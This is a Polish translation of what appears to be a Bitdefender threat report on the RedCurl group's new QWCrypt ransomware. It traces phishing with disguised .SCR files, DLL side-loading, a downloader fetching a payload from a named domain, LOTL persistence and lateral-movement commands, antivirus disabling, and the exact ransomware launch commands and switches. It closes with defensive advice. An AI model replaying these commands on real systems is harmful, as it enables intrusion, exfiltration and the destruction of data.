Debiut oprogramowania ransomware firmy RedCurl: dogłębna analiza techniczna

Niniejsze badanie, przeprowadzone przez Bitdefender Labs, przedstawia pierwszą udokumentowaną analizę kampanii ransomware przypisywaną grupie RedCurl (znanej również jako Earth Kapre lub Red Wolf). RedCurl do tej pory utrzymywał niski profil, polegając w dużym stopniu na technikach Living-off-the-Land (LOTL) w zakresie korporacyjnego cyberszpiegostwa i eksfiltracji danych. Ta zmiana w kierunku ransomware oznacza znaczącą ewolucję w ich taktyce. To nowe oprogramowanie ransomware, któremu zespół Bitdefender nadał nazwę QWCrypt na podstawie odniesienia do samego siebie „qwc” znalezionego w pliku wykonywalnym, nie zostało dotychczas udokumentowane i różni się od znanych rodzin oprogramowania ransomware.

Dzieląc się swoimi odkryciami ze społecznością zajmującą się wywiadem zagrożeń i kwestionując dotychczasowe założenia, zespół Bitdefender ma nadzieję zachęcić do dalszych badań nad tym nietypowym aktorem zagrożeń, który działa od 2018 r.

RedCurl: (Rudy) wilk w owczej skórze?

Motywacje RedCurl rodzą więcej pytań niż odpowiedzi. Choć często określa się ich mianem grupy cybernetycznego szpiegostwa, dowody potwierdzające tę klasyfikację są dla nas niejednoznaczne.

Duża część istniejących analiz przeprowadzonych przez innych badaczy bezpieczeństwa powtarza twierdzenie o cybernetycznym szpiegostwie, skupiając się głównie na aspektach technicznych. Podczas gdy analiza techniczna jest kluczowa, zespół Bitdefender zauważa, że równie ważne jest zbadanie ich modelu biznesowego i prawdziwych motywów stojących za ich działaniami w celu uzyskania pełnego obrazu operacyjnego.

Tradycyjnie cybernetyczne szpiegostwo jest domeną podmiotów sponsorowanych przez państwo, APT. Telemetria Bitdefender zidentyfikowała ofiary głównie w Stanach Zjednoczonych oraz w Niemczech, Hiszpanii i Meksyku. Inni badacze zgłosili jednak cele w Rosji, szeroki zakres geograficzny nietypowy dla grup sponsorowanych przez państwo.

Eksfiltracja danych, powszechnie stosowana taktyka w operacjach ransomware, zazwyczaj służy do wymuszenia okupu. Jednak Bitdefender nie znalazł żadnych historycznych dowodów (do tej pory) na to, że RedCurl próbował sprzedać skradzione dane z powrotem swoim ofiarom, co jest nietypowym odstępstwem. Ponadto grupy motywowane finansowo rzadko priorytetowo traktują kradzież zastrzeżonych informacji w celu uzyskania przewagi konkurencyjnej; dlatego trudno zidentyfikować podobną grupę hakerską.

Generowanie przychodów i cele operacyjne grupy pozostają owiane tajemnicą, szczególnie biorąc pod uwagę ich ciągłą działalność od 2018 r. W związku z tym ich model biznesowy i prawdziwe motywacje pozostają niejasne.

Hipoteza 1: Broń do wynajęcia

Biorąc pod uwagę anomalie w zachowaniu RedCurl, Bitdefender uważa za konieczne wprowadzenie czysto spekulatywnej hipotezy. Możliwe, że RedCurl działa jako grupa najemników. Wyjaśniałoby to ich zróżnicowaną wiktymologię i brak jasnego, spójnego wzorca operacyjnego. Ponadto hipoteza ta mogłaby potencjalnie wyjaśnić ich obecne zainteresowanie ransomware, które atakuje infrastrukturę, a nie komputery końcowe. W modelu najemniczym ransomware mogłoby służyć jako dywersja, maskując prawdziwy cel: ukierunkowaną operację eksfiltracji danych. Możliwe jest również, że RedCurl, po zakończeniu kontraktu na eksfiltrację danych, nie otrzymał zapłaty, co skłoniło ich do wykorzystania ransomware jako alternatywnego sposobu na monetyzację swojego dostępu.

Hipoteza 2: Operacje dyskretne

Zaskakujące wprowadzenie przez RedCurl szyfrowania hypervisora, przy jednoczesnym zachowaniu funkcjonalności bramy sieciowej i unikaniu szyfrowania punktów końcowych, sugeruje celowe działanie mające na celu ograniczenie wpływu ataku na dział IT. Ta strategia, jeśli celowa, zakłada, że RedCurl priorytetowo traktuje dyskretne, bezpośrednie negocjacje z ofiarami, minimalizując uwagę opinii publicznej.

Brak publicznie widocznych żądań okupu, na przykład za pośrednictwem dedykowanej witryny do przecieków (DLS), niekoniecznie oznacza, że RedCurl nie zwraca się bezpośrednio do ofiar. Jest prawdopodobne, że prowadzą prywatne negocjacje, co dodatkowo wzmacnia ich preferencję dla dyskretnych operacji i wyjaśnia brak publicznych ogłoszeń o ofiarach.

Takie podejście umożliwia rozszerzone, mało znane operacje, zapewniając stałe przychody szerokiej bazie klientów i zmniejszając ich widoczność dla organów ścigania. Ta hipoteza kontrastuje z modelem najemnika, sugerując, że RedCurl unika publicznego ujawniania jako podstawowej strategii operacyjnej od 2018 r.

Hipotezę tę dodatkowo potwierdzają ostatnie trendy branżowe. Raport Bitdefender Cybersecurity Assessment Report z 2023 r. ujawnił, że 42% respondentów zgłasza presję na ukrywanie naruszeń bezpieczeństwa. Co alarmujące, nasz nadchodzący raport z 2024 r. wskazuje, że ten trend się pogorszył, pokazując wzrost liczby ukrytych naruszeń.

Pierwszy dostęp

RedCurl tradycyjnie polegał na inżynierii społecznej i spear-phishingu, aby uzyskać początkowy dostęp do celów. W najnowszym wdrożeniu ransomware początkowy wektor infekcji pozostaje spójny z poprzednimi kampaniami RedCurl: e-maile phishingowe zawierające pliki IMG zamaskowane jako dokumenty CV.

Plik IMG jest zasadniczo kopią urządzenia pamięci masowej sektor po sektorze, jak dysk wirtualny. Gdy ofiara kliknie plik IMG dołączony do wiadomości phishingowej, systemy Windows 10 i 11 mają natywną obsługę automatycznego montowania go jako dysku wirtualnego. Przy domyślnej konfiguracji system Windows automatycznie otworzy zamontowany dysk, wyświetlając jego zawartość w Eksploratorze plików. Wtedy ofiara zobaczy plik o nazwie „CV APPLICANT 7802-91542.SCR”.

A oto mały sekret, którego większość ludzi nie zna: pliki wygaszacza ekranu (’.SCR’) są tak naprawdę po prostu przemianowanymi plikami wykonywalnymi. Kiedy klikniesz dwukrotnie plik (.SCR), system Windows traktuje go jak plik wykonywalny, ale z dodatkowym parametrem (/S), który nakazuje mu uruchomienie w trybie pełnoekranowym. A oto fajna część: działa to w obie strony. Możesz całkowicie zmienić nazwę pliku (.SCR) na (EXE) i uruchomić go (chociaż musisz uwzględnić parametr (/S)). Ale równie łatwo możesz zmienić nazwę dowolnego pliku (.EXE) na (.SCR), a system Windows chętnie go uruchomi. Po prostu doda ten parametr (/S), który nic nie zrobi, chyba że plik wykonywalny jest do tego przeznaczony.

Pliki wygaszaczy ekranu (.SCR) to po prostu pliki wykonywalne o zmienionej nazwie.

(CV APPLICANT 7802-91542.SCR) to po prostu zmieniona nazwa kopii prawidłowego pliku wykonywalnego Adobe, (ADNotificationManager.exe), a ten plik wykonywalny Adobe jest podatny na boczne ładowanie bibliotek DLL.

Gdy aplikacja się uruchamia, często ładuje biblioteki (DLL), aby wykonywać różne funkcje. Jeśli atakujący może umieścić złośliwą bibliotekę DLL o tej samej nazwie co legalna w tym samym folderze co aplikacja, aplikacja załaduje złośliwą ( przeczytaj nasz techniczny opis, aby uzyskać więcej szczegółów na temat tej techniki).

Biblioteki dynamicznego linkowania.

Przejmowanie bocznych ładowań bibliotek DLL i przejmowanie wykonywania zleceń

Dokładnie to dzieje się tutaj. Kiedy ofiara kliknie na plik (.SCR) (który, pamiętaj, jest po prostu przemianowanym .EXE), Windows go uruchamia. A z powodu tej luki w zabezpieczeniach bocznego ładowania DLL, automatycznie ładuje bibliotekę zawierającą złośliwy kod o nazwie (netutils.dll) z tego samego folderu.

Po uruchomieniu netutils.dll natychmiast wykonuje wywołanie (ShellExecuteA) z parametrem 'open’, przekierowując przeglądarkę ofiary na stronę https://secure.indeed.com/auth. Jest to celowe rozproszenie uwagi – legalna strona logowania Indeed ma wprowadzić ofiarę w błąd, sugerując, że otwiera jedynie CV. Ta taktyka socjotechniczna zapewnia okno, w którym złośliwe oprogramowanie może działać niezauważone.

Jednocześnie (netutils.dll) działa jako downloader. Wstępna analiza netutils.dll downloader ujawniła inne powtarzające się cechy zaobserwowane w poprzednich kampaniach RedCurl, w tym implementację zaszyfrowanych ciągów odszyfrowanych za pomocą bcrypt.dll. Używa funkcji wininet.dll do pobrania ostatecznego ładunku z domeny (fall[.]dropconnect[.]workers[.]dev , używając niestandardowego agenta użytkownika: ’ Mozilla/5.0 (Windows NT; Windows NT 10.0;) WindowsPowerShell/5.1.20134.790 (tQZyWLKnigaURyRIrnRG)’.)

Ten ostateczny ładunek jest przechowywany w (%APPDATA%\BrowserSpec\BrowserSpec_<reprezentacja nazwy hosta w formacie base64>.dll.) Aby ustanowić trwałość, tworzone jest zaplanowane zadanie o nazwie (\BrowserSpec\BrowserSpec_<reprezentacja nazwy hosta w formacie base64>). To zaplanowane zadanie wykonuje ostateczny ładunek pośrednio za pomocą następującego wiersza poleceń: (C:\Windows\system32\pcalua.exe -a rundll32 -c shell32.dll), (Control_RunDLL C:\Users\<user>\AppData\Roaming\BrowserSpec\BrowserSpec_.<reprezentacja nazwy hosta w formacie base64>.dll hard-wired-displacement)

Ta linia poleceń to klasyczny przykład technik Living Off The Land (LOTL), powszechnie stosowanej taktyki w nowoczesnych cyberatakach. Zasadniczo chodzi o wykorzystywanie legalnych narzędzi systemowych do przeprowadzania złośliwych działań, co utrudnia obrońcom wykrycie zagrożeń.

(C:\Windows\system32\pcalua.exe): Nasz pierwszy komponent LOTL to pcalua.exe, narzędzie Program Compatibility Assistant (PCA). Zostało zaprojektowane, aby pomóc starszym programom działać w nowszych wersjach systemu Windows, pomyśl o nim jako o opakowaniu zgodności. Może być nadużywane do wykonywania plików binarnych przez proxy.

• (-a rundll32): Polecenie to mówi pcalua.exe, aby uruchomił rundll32.exe, kolejne narzędzie LOTL. Rundll32.exe to narzędzie Windows służące do uruchamiania bibliotek DLL (Dynamic Link Libraries). To legalne narzędzie, ale może być nadużywane do uruchamiania złośliwych bibliotek DLL.
  (-c shell32.dll,Control_RunDLL C:\Users\<użytkownik>\AppData\Roaming\BrowserSpec\BrowserSpec_<reprezentacja nazwy hosta w formacie base64>.dll): Określa bibliotekę DLL (shell32.dll) i funkcję w tej bibliotece DLL (Control_RunDLL), którą powinien wywołać program rundll32.exe.
• Przełącznik -c użyty w tym kontekście z programem pcalua.exe skutecznie oznacza wszystko, co następuje po nim, jako parametry wiersza polecenia przekazywane do uruchamianego pliku wykonywalnego ( rundll32.exe ).
• (Control_RunDLL) to funkcja w shell32.dll (inny komponent LOTL), która jest przeznaczona do uruchamiania apletów panelu sterowania. Jednak może być nadużywana do wykonywania plików binarnych.
• (C:\Users\<user>\AppData\Roaming\BrowserSpec\BrowserSpec_<reprezentacja nazwy hosta w formacie base64>.dll) To jedyny złośliwy komponent w tym wierszu poleceń. To niestandardowa biblioteka DLL RedCurl, ładunek, który chcą wykonać. Kodowanie nazwy hosta w formacie base64 jest używane, aby nazwa była unikatowa dla każdego naruszone hosta.
• (hard-wired-displacement) Jest to nazwa funkcji DLL, którą należy wywołać z biblioteki złośliwie zainfekowanej.

Ten backdoor, proste, ale niezawodne narzędzie, działa jako ich główny punkt wejścia. Inni badacze bezpieczeństwa udokumentowali go wcześniej pod nazwami takimi jak RedCurl.Downloader lub Earth Kapre downloader. Ponieważ nasze badania koncentrują się na pierwszym udokumentowanym przypadku ransomware w operacjach RedCurl, nie będziemy powtarzać dobrze znanych zachowań tego złośliwego oprogramowania, które zostały już omówione.

Ruch boczny

Gdy RedCurl zdobędzie już początkową pozycję, jego uwaga skupi się na poruszaniu się po sieci, gromadzeniu informacji wywiadowczych i rozszerzaniu dostępu.

Mając dostęp do zagrożonych kont użytkowników w wielu systemach, RedCurl używał WMI do uruchamiania poleceń na innych komputerach. Gdy uruchamiają polecenia zdalnie, trzymają się wbudowanych narzędzi Windows. Nie wprowadzają żadnych zewnętrznych narzędzi, polegają tylko na technikach LOTL i używają zwykłych narzędzi Windows, takich jak powershell.exe, wmic.exe, certutil.exe lub tasklist.exe.

Analiza ujawniła użycie narzędzia do testów penetracyjnych, które wykorzystywało techniki odzwierciedlające te znalezione zarówno w starszych, wycofanych projektach wmiexec-RegOut, jak i obecnych projektach wmiexec-Pro. Ten zmodyfikowany wmiexec jest interesujący, ponieważ wymaga tylko portu 135 do działania, omijając potrzebę połączenia SMB, które jest często monitorowane przez narzędzia bezpieczeństwa. To narzędzie wyprowadza wyniki poleceń do plików w (C:\Windows\Temp\<6 losowych liter>) lub bezpośrednio do rejestru systemu Windows.

Poniżej przedstawiono przykłady takich poleceń

• (cmd.exe /Q /c powershell -c „Włącz-PSRemoting -force” 1> \\Windows\\Temp\\VSoNLA 2>&1)
• (cmd.exe /Q /c lista zadań | znajdź /I „outlook” 1> \\Windows\\Temp\\pgkVdT 2>&1)
• (cmd.exe /Q /c echo wmic process get Nazwa,Wiersz polecenia ^> \\\\N_b18353ea8eea835eb48cf281b2f632c6\\C$\\UGxqYI 2^>^&1 >
• C:\\Windows\\TEMP\\ABFHtO.bat &
• C:\\Windows\\system32\\cmd.exe /Q /c
• C:\\Windows\\TEMP\\ABFHtO.bat &
• C:\\Windows\\system32\\cmd.exe /Q /c del
• C:\\Windows\\TEMP\\ABFHtO.bat)
• (cmd.exe /Q /c dir C:\\users 1>
• C:\\windows\\temp\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt 2>&1 && certutil -encodehex -f
• C:\\windows\\temp\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt
• C:\\windows\\temp\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt 0x40000001 && dla /F „usebackq” %G w
• („C:\\windows\\temp\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt”) wykonaj reg add HKLM\\Software\\Classes\\evOFVQ /v ac77f6d6-74ce-4110-95e0-4ec2408968f2 /t REG_SZ /d „%G” /f && del /q /f /s
• C:\\windows\\temp\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt
• C:\\windows\\temp\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt)
• Bitdefender zaobserwował również użycie Chisel, szybkiego tunelu TCP/UDP przez HTTP. Eksperci podejrzewają, że był używany do dostępu RDP.

RedCurl w większości przypadków trzyma się swojego zwykłego podręcznika, kontynuując eksfiltrację danych przez dłuższe okresy czasu. Jednak jeden przypadek wyróżniał się. Złamali swoją rutynę i po raz pierwszy wdrożyli ransomware.

Wdrożenie oprogramowania ransomware

Incydent ransomware związany z RedCurl, wyróżnia się na tle innych. Oprócz pytań o ich motywację, godna uwagi jest także ich strategia ataków. Podczas gdy większość grup ransomware wdraża swoje ładunki na wszystkich punktach końcowych (często przy użyciu GPO lub PsExec), a niektóre obejmują hiperwizory, RedCurl atakował tylko hiperwizory.

Takie ukierunkowanie można interpretować jako próbę wyrządzenia maksymalnych szkód przy minimalnym wysiłku. Szyfrując maszyny wirtualne hostowane na hiperwizorach, czyniąc je niemożliwymi do uruchomienia, RedCurl skutecznie wyłącza całą wirtualizowaną infrastrukturę, wpływając na wszystkie hostowane usługi. Co ciekawe, celowo wykluczyli określone maszyny wirtualne pełniące rolę bram sieciowych, co dowodzi ich znajomości architektury sieciowej. Skrypty wsadowe użyte w ataku zawierały zakodowane na stałe informacje o środowisku, w tym nazwy maszyn, co wskazuje na precyzyjne ukierunkowanie operacji.

Utrzymując działanie bram sieciowych i unikając szyfrowania punktów końcowych, RedCurl prawdopodobnie chciał ograniczyć atak do zespołu IT, zapobiegając w ten sposób szerokim zakłóceniom i zwiększeniu świadomości użytkowników.

Skrypt uruchamiający

Ransomware o nazwie rbcw.exe został wdrożony z zaszyfrowanego archiwum 7z. Archiwum zostało wyodrębnione do katalogu (C:\ProgramData) przy użyciu pliku wykonywalnego 7-Zip (7za.exe) za pomocą polecenia (C:\ProgramData\7za.exe x -aoa –p BSoQ7N0H5……) (C:\ProgramData\a753506f51fc2.tmp).

Wykonywanie zostało zainicjowane za pomocą specjalnie przygotowanych plików wsadowych, specjalnie dostosowanych do środowiska ofiary. Początkowy plik wsadowy, (a753506f51fc.bat), został wykonany za pomocą polecenia (cmd.exe/c C:\ProgramData\a753506f51fc.bat –pass BSoQ7N0H5…… –main a753506f51fc –key <key> –timeout -7793). Główną funkcją pliku wsadowego a753506f51fc.bat jest wyłączenie Windows Defendera przed uruchomieniem kolejnego skryptu.

Chociaż nie możemy ostatecznie potwierdzić istnienia oddzielnych skryptów dostosowanych do innych rozwiązań zabezpieczających punkty końcowe, dochodzenie Bitdefender ujawniło wiele wskazówek, że RedCurl próbuje ominąć różne produkty zabezpieczające. Plik wsadowy zawiera wiele odniesień do pliku wykonywalnego Term.exe. Ten plik wykonywalny jest powiązany z plikiem PDB o nazwie „Terminator_v1.1”, potencjalnie powiązanym ze znanym sterownikiem „przynieś własny podatny na ataki sterownik” (BYOVD). BYOVD wykorzystuje legalne, ale podatne na ataki sterowniki do podnoszenia uprawnień i wyłączania oprogramowania zabezpieczającego Ponadto plik konfiguracyjny ransomware zawiera jawne wykluczenia dotyczące kilku rozwiązań zabezpieczeń punktów końcowych, w tym Windows Defender, Malwarebytes, VIPRE Business Agent, Bitdefender i SentinelOne.

Skrypt główny

Po początkowym etapie wyłączania zabezpieczeń punktu końcowego skrypt a753506f51fc.bat przystępuje do wykonania skryptu odpowiedzialnego za uruchomienie procesu szyfrowania oprogramowania ransomware (rnm.bat lub rn.bat) przy użyciu polecenia wiersza poleceń (cmd.exe /c C:\\ProgramData\\rnm.bat –pass BSoQ7N0H5…… –main a753506f51fc –key <key>).

Skrypty rozpoczynają pracę od analizy argumentów wiersza poleceń w celu pobrania kluczowych parametrów: hasła deszyfrującego (tpass), nazwy głównego pliku wykonywalnego (tmain) i klucza szyfrującego (tkey).

Skrypty następnie konfigurują zmienne do zdalnego rejestrowania i eksfiltracji danych. Zmienna davstr definiuje adres URL WebDAV do zdalnego przechowywania plików, a zmienne slog i spass przechowują poświadczenia dostępu do tej zdalnej lokalizacji. Co ciekawe, próba przesłania plików za pomocą programu PowerShell jest obecna, ale została zakomentowana i zastąpiona przez curl.exe do przesyłania danych. Sugeruje to, że atakujący mogli napotkać problemy z wykonywaniem programu PowerShell lub woleli niezawodność programu curl.

Kluczowym aspektem tych skryptów jest ich dostosowanie do konkretnych ofiar. Skrypt zawiera bloki warunkowe, które wykonują ukierunkowane usuwanie kopii zapasowych na podstawie nazwy hosta. Na przykład na jednym hoście Hyper-V skrypt usuwa określone katalogi kopii zapasowych i pliki wirtualnego dysku twardego.

Przed zainicjowaniem szyfrowania skrypt wykonuje kilka zadań rozpoznania i czyszczenia systemu. Zatrzymuje i usuwa usługę Term, która jest powiązana z procesem term.exe, prawdopodobnie używanym do wyłączania zabezpieczeń punktów końcowych. Następnie skrypt przechwytuje informacje systemowe, w tym uruchomione procesy i szczegóły dysku logicznego, i rejestruje je w plikach w katalogu tymczasowym (%ALLUSERSPROFILE%\temp_3a3352baf).

Następnie wykonywana jest podstawowa procedura szyfrowania. Program szyfrujący ransomware, rbcw.exe, jest uruchamiany dwukrotnie dla maszyn wirtualnych (–hv switch) i dwukrotnie dla samego hosta, łącznie cztery razy.

Użyte polecenia to:

• (rbcw.exe –hv –excludeVM „wingate<podsieć1>,wingate,wingate<podsieć2>” –key %tkey% –nosd >%tdir%\%nazwakomputera%_rbcw_hv_1.log 2>&1)
• (rbcw.exe –hv –excludeVM „wingate<podsieć1>,wingate,wingate<podsieć2>” –key %tkey% –nosd >%tdir%\%nazwakomputera%_rbcw_hv_2.log 2>&1)
• (rbcw.exe –key %tkey% –nosd >%tdir%\%nazwakomputera%_rbcw_1.log 2>&1)
• (rbcw.exe –key %tkey% >%tdir%\%nazwakomputera%_rbcw_2.log 2>&1)

Analiza tych poleceń pokazuje, że:

• (rbcw.exe): To jest plik wykonywalny ransomware.
• (–hv): Ta flaga wskazuje, że atak ransomware powinien dotyczyć maszyn wirtualnych Hyper-V.
• (–excludeVM „wingate<subnet1>,wingate,wingate<subnet2>”): Ta opcja określa listę rozdzielonych przecinkami maszyn wirtualnych, które mają zostać wykluczone z szyfrowania; w tym przypadku są to bramy sieciowe.
• (–key %tkey%): Ten argument zawiera klucz szyfrowania, który jest dynamicznie przekazywany z poprzedniego pliku wsadowego.
• (–nosd): Ta flaga nakazuje programowi ransomware, aby nie usuwał się sam po zaszyfrowaniu.
• (>%tdir%\%computername%_rbcw_*.log 2>&1): Te części przekierowują dane wyjściowe i komunikaty o błędach oprogramowania ransomware do plików dziennika w katalogu tymczasowym.

To podwójne wykonanie, w połączeniu z dwoma oddzielnymi plikami dziennika, wskazuje na celową próbę zapewnienia całkowitego szyfrowania lub zebrania informacji debugowania do dalszego rozwoju. Pliki nie są szyfrowane dwukrotnie ze względu na kontrole rozszerzenia .randombits, podwójne wykonanie prawdopodobnie ma na celu wyłapanie plików pominiętych podczas początkowego przebiegu.

Należy zauważyć brak flagi (–nosd) przy ostatnim poleceniu, która nakazuje programowi szyfrującemu ransomware samodzielne usunięcie się po wykonaniu polecenia.

Na koniec skrypt sprząta po sobie, usuwając plik wykonywalny ransomware, narzędzia pomocnicze i pliki tymczasowe. To dokładne czyszczenie ma na celu zminimalizowanie śladu atakujących i skomplikowanie analizy kryminalistycznej. Pliki wsadowe wykazują wysoki stopień dopracowania i dostosowania, co dodatkowo wskazuje na wyrafinowanego aktora zagrożenia z głębokim zrozumieniem środowiska ofiary.

Analiza szyfrowania ransomware

Plik binarny ransomware, rbcw.exe, jest plikiem wykonywalnym Go spakowanym UPX. Warto zauważyć, że ten szczep ransomware jest nowy; analiza Bitdefender nie ujawniła żadnych podobnych próbek ani znanych rodzin ransomware. Po rozpakowaniu plik binarny jest zaciemniony, ale opcje wiersza poleceń (–help) i (/h) zapewniają jasny przegląd funkcji ransomware.

• (-k, –key) – Ten argument dostarcza klucz szyfrowania, który jest niezbędny do działania ransomware. Bez tego klucza ransomware nie zaszyfruje żadnych plików. Ten klucz jest używany do generowania klucza XChaCha20-Poly1305 używanego do odszyfrowania danych konfiguracyjnych, które obejmują notatkę o okupie.
• (–fold) – Ten przełącznik definiuje foldery, w których należy wyszukiwać pliki do zaszyfrowania. Wartość domyślna to „all”, co oznacza, że ransomware przeszuka wszystkie dostępne foldery.
• (–nosd) – Ta flaga instruuje ransomware, aby nie usuwał się sam po szyfrowaniu. Bez tej flagi ransomware usunie się sam po zakończeniu operacji.
• (–noshadowdelete) – Ten przełącznik uniemożliwia ransomware usunięcie kopii w tle.
• (–hv) –Ta flaga włącza szyfrowanie maszyn wirtualnych Hyper-V. Jeśli jest obecna, ransomware zaszyfruje maszyny wirtualne uruchomione na bieżącym hoście.
• (–excludeVM) – Opcja ta określa listę maszyn wirtualnych (VM) oddzielonych przecinkami, które mają zostać wyłączone z szyfrowania.
• (–kill) – Ten przełącznik służy do kończenia procesów maszyn wirtualnych.
• (–full-enc-less string) –Ta opcja określa maksymalny rozmiar pliku dla pełnego szyfrowania. Pliki mniejsze od tego rozmiaru zostaną w pełni zaszyfrowane, podczas gdy większe pliki mogą zostać częściowo zaszyfrowane. Wartość domyślna to „50M”, co oznacza 50 megabajtów.
• (–skip-count int) – Ten przełącznik pozwala ransomware pominąć określoną liczbę bloków podczas szyfrowania. Domyślnie jest to 5. Zamiast szyfrować każdy kolejny blok danych w pliku, ransomware pomija określoną liczbę bloków, pozostawiając części oryginalnego pliku niezaszyfrowane. Dzięki częściowemu szyfrowaniu ransomware może znacznie przyspieszyć proces szyfrowania, ale także uniknąć wykrycia przez niektóre mechanizmy wykrywania.
• (–minsize string) – Ten przełącznik służy do ustawienia minimalnego rozmiaru pliku do zaszyfrowania.
• (–maxsize string) – Ten przełącznik służy do ustawienia maksymalnego rozmiaru pliku do zaszyfrowania.
• (–block-size string) – Ten przełącznik definiuje rozmiar bloku AES używany podczas szyfrowania. Wartość domyślna to „1M”, co oznacza rozmiar bloku 1 megabajta. Ten parametr umożliwia atakującym dostosowanie wydajności procesu szyfrowania.
• (–chacha) – Ta flaga umożliwia użycie algorytmu ChaCha20 do szyfrowania. Jeśli ten przełącznik nie jest obecny, ransomware domyślnie używa szyfrowania AES.
• (–dryrun) – Ten przełącznik włącza tryb „testu na sucho”, w którym ransomware symuluje proces szyfrowania, nie modyfikując żadnych plików.
• (-h, –help) – Ten przełącznik wyświetla informacje pomocy, zawierające listę wszystkich dostępnych opcji wiersza poleceń i ich opisy.
• (-i, –info) – Ten przełącznik drukuje informacje systemowe do konsoli lub pliku dziennika. Jest to prawdopodobnie wykorzystywane do celów rozpoznawczych, dostarczając atakującym szczegółów na temat naruszonego systemu.
• (–log string) – Opcja ta określa ścieżkę do pliku dziennika, w którym ransomware będzie rejestrować swoje działania.
• (–threads int) – Ta opcja określa liczbę wątków używanych podczas szyfrowania. Wartość domyślna to 10. Ten parametr pozwala atakującym dostosować wydajność procesu szyfrowania.
• (–turnoff) – Ten przełącznik wyłącza maszyny wirtualne Hyper-V. Domyślnie jest to true.
• (-v, –verbose) – Ta flaga włącza tryb szczegółowych danych wyjściowych, dostarczając bardziej szczegółowych informacji na temat działań ransomware.\

Przełącznik wiersza poleceń (–key) jest krytyczny dla funkcjonalności rbcw.exe, ponieważ odszyfrowuje również plik konfiguracyjny ransomware. Ta konfiguracja obejmuje notatkę o okupie. Ta zależność od klucza również stanowi wyzwanie dla analizy, ponieważ bez jego znajomości badacze nie mogą uzyskać bezpośredniego dostępu do konfiguracji.

Ciekawym szczegółem jest obecność zakodowanego na stałe osobistego identyfikatora w notatce o okupie. Ten identyfikator nie jest dowolny; prawdopodobnie jest kluczem do unikalnej pary kluczy RSA, z odpowiadającym mu kluczem publicznym osadzonym w konfiguracji ransomware. Oznacza to, że atakujący utrzymują pasujący klucz prywatny, wymagany do odszyfrowania plików ofiary. Dlatego osobisty identyfikator działa jako unikalny identyfikator, bezpośrednio łącząc ofiarę z jej konkretnym kluczem odszyfrowywania.

(—–BEGIN RSA PUBLIC KEY—–
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvYOTAPKPqDh4tmHDlwnE
+ZzXvIDoAci3RnrZ5U+ufN8DIC2aKw5/c96A5icvtHHZZaRUIMEoug0RLOVmZ2Xb 28Wj4WvR4b+i+OC2bOQzMuMv86lhEGa6gD0k3Hk0QkVGjwM+9wtaBSWiePA4xsNC K66g0Uf4rB8zIpx/1hHlWxsTgKUoOObXiBc5XuhqoUHUkyEfy3TFPHprdetf0CLo f+NWUnjp2fuUyVZFSEvaCHd3lw5WeqbcQg+CukGnXgcJ5QP3ubgWHATagLKflFv3 qbGLiMNuQYUVJ0Cqc4YlZOVlbkyOJvsCekFZtciD5SEipLMeWC955wI8xGKeZuK2
HQIDAQAB
—–END RSA PUBLIC KEY—–)

Analiza notatki ransomware

Analiza notatki o okupie ujawnia, że nie jest to oryginalne dzieło. Zamiast tego składa się z sekcji pochodzących z notatek o okupie innych znanych grup ransomware, w tym LockBit, HardBit i Mimic. Ta praktyka ponownego wykorzystywania istniejącego tekstu notatki o okupie rodzi pytania o pochodzenie i motywy grupy RedCurl. Co ciekawe, nie ma znanej dedykowanej witryny wycieku (DLS) powiązanej z tym ransomware i nadal nie jest jasne, czy notatka o okupie stanowi prawdziwą próbę wymuszenia, czy też dywersję.

Wnioski i zalecenia

Ostatnie wdrożenie ransomware przez grupę RedCurl oznacza znaczącą ewolucję w ich taktyce. To odejście od ustalonego modus operandi podnosi krytyczne pytania o ich motywacje i cele operacyjne. Wysoce ukierunkowany charakter ataku ransomware pokazuje dobrze zaplanowaną i wykonaną operację.

Aby ograniczyć ryzyko ataków ransomware podobnych do tych przeprowadzanych przez firmę RedCurl, a także zgodnie z informacjami zawartymi w dokumencie Ransomware Whitepaper firmy Bitdefender , zalecamy podjęcie następujących działań:

1. Wielowarstwowa obrona: Przyjęcie wielowarstwowego podejścia do bezpieczeństwa jest niezbędne. Organizacje powinny inwestować w różnorodne kontrole bezpieczeństwa, w tym segmentację sieci i ochronę punktów końcowych za pomocą skutecznych antywirusów, aby tworzyć nakładające się warstwy obrony przed cyberzagrożeniami.

2. Wykrywanie i reakcja: Pomimo wszelkich starań, nadal możliwe jest, że współcześni cyberprzestępcy przejdą obok Twoich kontroli zapobiegania i ochrony. To właśnie tutaj wchodzą w grę Twoje możliwości wykrywania i reagowania. Niezależnie od tego, czy otrzymujesz te możliwości jako produkt (EDR / XDR), czy jako usługę MDR), celem jest zminimalizowanie czasu, w którym aktorzy zagrożeń pozostają niewykryci. Zespół Bitdefender MDR przeprowadza proaktywne przeszukiwanie środowiska w celu wykrycia złośliwych, podejrzanych lub ryzykownych działań, które uniknęły wykrycia przez istniejące narzędzia. Użyj analizy behawioralnej i wykrywania anomalii, aby zidentyfikować podejrzane działania, takie jak nietypowe tunelowanie za pomocą narzędzi takich jak chisel lub zdalne wykonywanie za pomocą wmiexec-RegOut.

3. Priorytetyzacja zapobiegania Living-off-the-Land (LOTL): Prawie wszyscy współcześni cyberprzestępcy nadużywają legalnych narzędzi systemowych do złośliwych celów, skup się na zapobieganiu i wykrywaniu ataków LOTL. Wdrażaj ścisłą kontrolę aplikacji, aby ograniczyć wykonywanie nieautoryzowanych skryptów i plików binarnych, nawet tych podpisanych przez zaufanych dostawców. Wzmocnij środowisko PowerShell i inne środowiska skryptowe, wymuszając zasady wykonywania i włączając ulepszone rejestrowanie. Monitoruj nietypowe wykonania procesów i argumenty wiersza poleceń, ponieważ RedCurl wykorzystuje narzędzia takie jak curl.exe i wmic.exe do złośliwych działań. Ponadto ogranicz uprawnienia administracyjne i wdróż zasady najmniejszych uprawnień, aby ograniczyć wpływ naruszonych kont.

